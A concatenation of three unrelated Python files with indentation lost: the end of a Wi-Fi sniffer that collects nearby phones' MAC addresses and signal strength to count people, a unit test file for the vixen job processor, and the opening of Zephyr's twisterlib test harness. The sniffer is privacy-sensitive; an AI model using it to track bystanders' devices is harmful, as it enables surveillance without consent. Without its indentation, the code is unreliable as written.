if ':' not in dats[0] or len(dats) != 3:
continue
if mac not in foundFullSpectrumMacs:
foundFullSpectrumMacs[mac] = []
dats_2_split = dats[2].split(',')
if len(dats_2_split) > 1:
rssi = float(dats_2_split[0]) / 2 + float(dats_2_split[1]) / 2
else:
rssi = float(dats_2_split[0])
foundFullSpectrumMacs[mac].append(rssi)
for line in output_probe.decode('utf-8').split('\n'):
if verbose:
print(line)
if line.strip() == '':
continue
mac = line.split()[0].strip().split(',')[0]
dats = line.split()
if len(dats) == 3:
if ':' not in dats[0] or len(dats) != 3:
continue
if mac not in foundProbeMacs:
foundProbeMacs[mac] = []
dats_2_split = dats[2].split(',')
if len(dats_2_split) > 1:
rssi = float(dats_2_split[0]) / 2 + float(dats_2_split[1]) / 2
else:
rssi = float(dats_2_split[0])
foundProbeMacs[mac].append(rssi)
for line in output_resolution.decode('utf-8').split('\n'):
if verbose:
print(line)
if line.strip() == '':
continue
mac = line.split()[0].strip().split(',')[0]
dats = line.split("\t")
if len(dats) == 3 and len(dats[1]) > 0:
if ':' not in dats[0] or len(dats) != 3:
continue
if mac not in foundRealDeviceMacs:
foundRealDeviceMacs[mac] = []
dats_2_split = dats[2].split(',')
if len(dats_2_split) > 1:
rssi = float(dats_2_split[0]) / 2 + float(dats_2_split[1]) / 2
else:
try:
rssi = float(dats_2_split[0])
except ValueError:
rssi = 0
foundRealDeviceMacs[mac].append(rssi)
if not foundFullSpectrumMacs:
print("Found no macs, check the 'tshark' command and make sure Wifi card: %s supports monitor mode." % adapter)
return
if not foundRealDeviceMacs:
print("No real macs were found. Ignoring.")
for key, value in foundFullSpectrumMacs.items():
foundFullSpectrumMacs[key] = float(sum(value)) / float(len(value))
for key, value in foundRealDeviceMacs.items():
foundRealDeviceMacs[key] = float(sum(value)) / float(len(value))
for key, value in foundProbeMacs.items():
foundProbeMacs[key] = float(sum(value)) / float(len(value))
# Find target MAC address in foundMacs
if targetmacset:
sys.stdout.write(RED)
for mac in foundFullSpectrumMacs:
if mac in targetmacset:
print("Found MAC address: %s" % mac)
print("rssi: %s" % str(foundFullSpectrumMacs[mac]))
sys.stdout.write(RESET)
cellphone = [
'Motorola Mobility LLC, a Lenovo Company',
'GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD',
'Huawei Symantec Technologies Co.,Ltd.',
'Microsoft',
'HTC Corporation',
'Samsung Electronics Co.,Ltd',
'SAMSUNG ELECTRO-MECHANICS(THAILAND)',
'BlackBerry RTS',
'LG ELECTRONICS INC',
'Murata Manufacturing Co., Ltd.',
'Nokia Corporation',
'Apple, Inc.',
'BLU Products Inc.',
'vivo Mobile Communication Co., Ltd.',
'Alcatel-Lucent Shanghai Bell Co., Ltd',
'BlackBerry RTS',
'LG Electronics',
'OnePlus Tech (Shenzhen) Ltd',
'OnePlus Technology (Shenzhen) Co., Ltd',
'LG Electronics (Mobile Communications)',
'OnePlus Tech (Shenzhen) Ltd',
'Xiaomi Communications Co Ltd',
'LG Electronics (Mobile Communications)',
'Google, Inc.',
'zte corporation',
'Sony Corporation',
'Sony Mobile Communications AB',
'GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD',
'Gionee Communication Equipment Co.,Ltd.',
'Lenovo Mobile Communication Technology Ltd.'
'Xiaomi Communications Co Ltd'
'HUAWEI TECHNOLOGIES CO.,LTD']
cellphone_people = []
cellphone_macs = []
cellphone_probe_macs = []
androids = 0
iphones = 0
others = 0
for mac in foundFullSpectrumMacs:
oui_id = 'Not in OUI'
if mac[:8] in oui:
oui_id = oui[mac[:8]]
if verbose:
print(mac, oui_id, oui_id in cellphone)
if allmacaddresses or oui_id in cellphone:
if not nearby or (nearby and foundFullSpectrumMacs[mac] > 80):
cellphone_people.append(
{'company': oui_id, 'rssi': foundFullSpectrumMacs[mac], 'mac': mac})
if oui_id == 'Apple, Inc.':
iphones += 1
elif oui_id in cellphone:
androids += 1
elif oui_id != 'Not in OUI':
others += 1
else:
""
for mac in foundProbeMacs:
oui_id = 'Not in OUI'
if mac[:8] in oui:
oui_id = oui[mac[:8]]
if verbose:
print(mac, oui_id, oui_id in cellphone)
if not nearby or (nearby and foundProbeMacs[mac] > -80):
cellphone_probe_macs.append(
{'company': oui_id, 'rssi': foundProbeMacs[mac], 'mac': mac})
for mac in foundRealDeviceMacs:
oui_id = 'Not in OUI'
if mac[:8] in oui:
oui_id = oui[mac[:8]]
if verbose:
print(mac, oui_id, oui_id in cellphone)
if not nearby or (nearby and foundRealDeviceMacs[mac] > -120):
cellphone_macs.append(
{'company': oui_id, 'rssi': foundRealDeviceMacs[mac], 'mac': mac})
if sort:
cellphone_people.sort(key=lambda x: x['rssi'], reverse=True)
if verbose:
print(json.dumps(cellphone_people, indent=2))
# US / Canada: https://twitter.com/conradhackett/status/701798230619590656
percentage_of_people_with_phones = 0.7
if nocorrection:
percentage_of_people_with_phones = 1
num_devices = int(round(len(cellphone_probe_macs) / percentage_of_people_with_phones))
num_resolved_devices = int(round(len(cellphone_macs)))
if number and not jsonprint:
print("Total: {}".format(num_devices))
print("iPhones: {} Androids: {}".format(iphones, androids))
# print(cellphone_people)
# adding IFTTT post
# iftttpost(iphones, androids)
elif jsonprint:
# print(json.dumps(cellphone_people, indent=2))
localhost_report(iphones, androids, others, num_devices, num_resolved_devices)
localhost_report_real(cellphone_macs)
else:
if num_devices == 0:
print("No one around (not even you!).")
elif num_devices == 1:
print("No one around, but you.")
else:
print("There are about %d people around." % num_devices)
if out:
with open(out, 'a') as f:
data_dump = {'cellphones': cellphone_people, 'time': time.time()}
f.write(json.dumps(data_dump) + "\n")
if verbose:
print("Wrote %d records to %s" % (len(cellphone_people), out))
os.remove('/tmp/tshark-temp')
return adapter
if __name__ == '__main__':
main()
# oui = {}
# with open('data/oui.txt','r') as f:
# for line in f:
# if '(hex)' in line:
# data = line.split('(hex)')
# key = data[0].replace('-',':').strip()
# company = data[1].strip()
# oui[key] = company
# with open('oui.json','w') as f:
# f.write(json.dumps(oui,indent=2))
|
test_processor.py
|
import mock
import os
import shutil
import tempfile
from threading import Thread
import time
import unittest
from vixen.processor import Processor, Job, CommandFactory, \
PythonFunctionFactory, TaggerFactory, dump, load
from vixen.tests.test_directory import make_data
from vixen.project import Project, TagInfo
class TestJob(unittest.TestCase):
def test_simple_job(self):
# Given
func = mock.Mock(return_value='hello')
args = [1, 2]
kw = {'a': 10, 'b': 20}
j = Job(func=func, args=args, kw=kw)
self.assertEqual(j.status, 'none')
self.assertEqual(j.result, None)
# When
j.run()
j.thread.join()
# Then
self.assertEqual(j.status, 'success')
func.assert_called_once_with(*args, **kw)
self.assertEqual(j.result, 'hello')
self.assertEqual(j.error, '')
def test_job_captures_errors(self):
def bomb():
assert 1 == 2
# Given
j = Job(func=bomb)
# When
j.run()
j.thread.join()
# Then
self.assertEqual(j.status, 'error')
self.assertIn('AssertionError', j.error)
self.assertIn('assert 1 == 2', j.error)
self.assertTrue(len(j.error) > 1, "Got: %s" % j.error)
class TestProcessor(unittest.TestCase):
def test_processor_completes_jobs(self):
# Given
jobs = [Job(func=mock.Mock(return_value=x), args=[x])
for x in range(10)]
p = Processor(jobs=jobs)
self.assertEqual(p.status, 'none')
# When
p.process()
# Then
self.assertEqual(p.status, 'success')
self.assertEqual(len(p.completed), 10)
for i, j in enumerate(jobs):
self.assertEqual(j.status, 'success')
j.func.assert_called_once_with(i)
self.assertEqual(j.result, i)
def test_processor_pauses_correctly(self):
# Given
def _sleep(x):
time.sleep(0.01)
return x
jobs = [Job(func=mock.Mock(side_effect=_sleep), args=[x])
for x in range(10)]
p = Processor(jobs=jobs)
self.addCleanup(p.stop)
self.assertEqual(p.status, 'none')
# When
t = Thread(target=p.process)
t.start()
# Sleep for a tiny bit and pause
time.sleep(0.05)
p.pause()
time.sleep(0.01)
# Then
self.assertEqual(p.status, 'running')
self.assertTrue(len(p.completed) < 10)
# When
p.resume()
count = 0
while p.status == 'running' and count < 10:
time.sleep(0.5)
count += 1
self.assertEqual(len(p.completed), 10)
self.assertEqual(len(p.running), 0)
for i, j in enumerate(jobs):
self.assertEqual(j.status, 'success')
j.func.assert_called_once_with(i)
self.assertEqual(j.result, i)
def test_processor_stops_correctly(self):
# Given
def _sleep(x):
time.sleep(0.01)
return x
jobs = [Job(func=mock.Mock(side_effect=_sleep), args=[x])
for x in range(5)]
p = Processor(jobs=jobs)
self.addCleanup(p.stop)
self.assertEqual(p.status, 'none')
# When
t = Thread(target=p.process)
t.start()
# Sleep for a tiny bit and pause
time.sleep(0.05)
p.stop()
count = 0
while p.status == 'running' and count < 10:
time.sleep(0.05)
count += 1
# Then
self.assertEqual(p.status, 'success')
self.assertTrue(len(p.completed) < 5)
self.assertEqual(len(p.running), 0)
for i, j in enumerate(p.completed):
self.assertEqual(j.status, 'success')
j.func.assert_called_once_with(i)
self.assertEqual(j.result, i)
def test_processor_bails_on_error(self):
# Given
f = mock.Mock()
def bomb():
f()
assert 1 == 2
jobs = [Job(func=bomb)]
jobs.extend(
Job(func=mock.Mock(return_value=x), args=[x]) for x in range(10)
)
p = Processor(jobs=jobs)
# When
p.process()
# Then
self.assertEqual(p.status, 'error')
self.assertTrue(len(p.completed) < 10)
self.assertEqual(len(p.errored_jobs), 1)
self.assertEqual(f.call_count, 1)
self.assertEqual(p.errored_jobs[0].status, 'error')
# When process is called again it should run the remaining unfinished
# jobs.
p.process()
# Then
self.assertEqual(p.status, 'error')
self.assertEqual(len(p.completed), 10)
for i, j in enumerate(p.completed):
self.assertEqual(j.status, 'success')
j.func.assert_called_once_with(i)
self.assertEqual(j.result, i)
self.assertEqual(len(p.errored_jobs), 1)
self.assertEqual(p.errored_jobs[0].status, 'error')
self.assertEqual(f.call_count, 2)
class TestFactoryBase(unittest.TestCase):
def setUp(self):
self._temp = tempfile.mkdtemp()
self.root = os.path.join(self._temp, 'test')
self.root1 = os.path.join(self._temp, 'test1')
make_data(self._temp)
def tearDown(self):
shutil.rmtree(self._temp)
class TestCommandFactory(TestFactoryBase):
def test_command_factory_commands(self):
# Given.
cf = CommandFactory(dest=self.root1, input_extension='.py',
output_extension='.rst',
command="echo $input $output")
p = Project(name='test', path=self.root)
p.scan()
# When
jobs = cf.make_jobs(p.keys(), p)
# Then.
self.assertEqual(len(jobs), 1)
job = jobs[0]
m = p.get('hello.py')
dest = os.path.join(self.root1, 'hello.rst')
expect = ('echo %s %s' % (m.path, dest)).replace('\\', '\\\\')
self.assertEqual(job.args, [expect.split(), m.path, dest])
def test_command_factory_jobs(self):
# Given.
import sys
command = """\
%r -c 'import shutil;shutil.copy("$input", "$output")'\
""" % sys.executable
cf = CommandFactory(dest=self.root1, input_extension='.py',
output_extension='.rst',
command=command, copy_timestamps=True)
p = Project(name='test', path=self.root)
p.scan()
# When
jobs = cf.make_jobs(p.keys(), p)
job = jobs[0]
job.run()
job.thread.join()
# Then.
self.assertEqual(len(jobs), 1)
self.assertEqual(job.status, 'success')
m = p.get('hello.py')
dest = os.path.join(self.root1, 'hello.rst')
self.assertTrue(os.path.exists(dest))
self.assertEqual(cf._done[dest], True)
s_stat = os.stat(m.path)
d_stat = os.stat(dest)
self.assertTrue(abs(s_stat.st_mtime - d_stat.st_mtime) < 2)
self.assertTrue(abs(s_stat.st_ctime - d_stat.st_ctime) < 2)
jobs = cf.make_jobs(p.keys(), p)
self.assertEqual(len(jobs), 0)
# When.
data = dump(cf)
cf1 = load(data)
# Then.
for attr in cf.__dict__.keys():
self.assertEqual(getattr(cf1, attr), getattr(cf, attr))
def test_command_factory_ignores_non_existing_paths(self):
# Given.
cf = CommandFactory(dest=self.root1, input_extension='.py',
output_extension='.rst',
command="echo $input $output")
p = Project(name='test', path=self.root)
p.scan()
os.remove(os.path.join(self.root, 'hello.py'))
# When
jobs = cf.make_jobs(p.keys(), p)
# Then.
self.assertEqual(len(jobs), 0)
class TestPythonFunctionFactory(TestFactoryBase):
def test_python_function_factory(self):
# Given.
from textwrap import dedent
code = dedent("""
def process(relpath, media, dest):
media.tags['completed'] = True
media.tags['args'] = "%s %s"%(relpath, dest)
""")
factory = PythonFunctionFactory(code=code, dest=self.root1)
p = Project(name='test', path=self.root)
p.add_tags([TagInfo(name='args', type='string')])
p.scan()
# When
jobs = factory.make_jobs(p.keys(), p)
for job in jobs:
job.run()
job.thread.join()
# Then.
self.assertEqual(len(jobs), 5)
for key in p.keys():
media = p.get(key)
self.assertEqual(media.tags['completed'], True)
expect = "%s %s" % (key, self.root1)
self.assertEqual(media.tags['args'], expect)
# When
jobs = factory.make_jobs(p.keys(), p)
# Then
self.assertEqual(len(jobs), 0)
# When.
data = dump(factory)
f1 = load(data)
# Then.
# The func should not be dumped.
self.assertEqual(f1._func, None)
self.assertNotIn('_func', data[1])
f = factory
for attr in ['code', '_done']:
self.assertEqual(getattr(f1, attr), getattr(f, attr))
class TestTaggerFactory(TestFactoryBase):
def test_tagger_factory_tags_known_tags(self):
# Given.
code = 'import sys; print("args:"+sys.argv[1]'\
'+"\nlength:10\ncompleted:yes\n")'
command = "python -c %r" % code
factory = TaggerFactory(command=command)
p = Project(name='test', path=self.root)
p.add_tags(
[
TagInfo(name='args', type='string'),
TagInfo(name='length', type='int')
]
)
p.scan()
# When
jobs = factory.make_jobs(p.keys(), p)
for job in jobs:
job.run()
job.thread.join()
# Then.
self.assertEqual(len(jobs), 5)
for job in jobs:
self.assertEqual(job.status, 'success')
for key in p.keys():
media = p.get(key)
self.assertEqual(media.tags['completed'], True)
expect = "%s" % (media.path)
self.assertEqual(media.tags['args'], expect)
self.assertEqual(media.tags['length'], 10)
# When
jobs = factory.make_jobs(p.keys(), p)
# Then
self.assertEqual(len(jobs), 0)
# When.
data = dump(factory)
f1 = load(data)
# Then.
# The _tag_types should not be dumped.
self.assertEqual(f1._tag_types, None)
self.assertNotIn('_tag_types', data[1])
f = factory
for attr in ['command', '_done']:
self.assertEqual(getattr(f1, attr), getattr(f, attr))
def test_tagger_factory_skips_unknown_tags(self):
# Given.
code = 'import sys; print("\nlength:10\nxxx:yes\n")'
command = "python -c %r" % code
factory = TaggerFactory(command=command)
p = Project(name='test', path=self.root)
p.scan()
# When
jobs = factory.make_jobs(p.keys(), p)
for job in jobs:
job.run()
job.thread.join()
# Then.
self.assertEqual(len(jobs), 5)
for key in p.keys():
media = p.get(key)
self.assertTrue('length' not in media.tags)
self.assertTrue('xxx' not in media.tags)
self.assertEqual(media.tags['completed'], False)
if __name__ == '__main__':
unittest.main()
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or not (d.serial or d.serial_pty):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug("Using serial device {}".format(serial_device))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
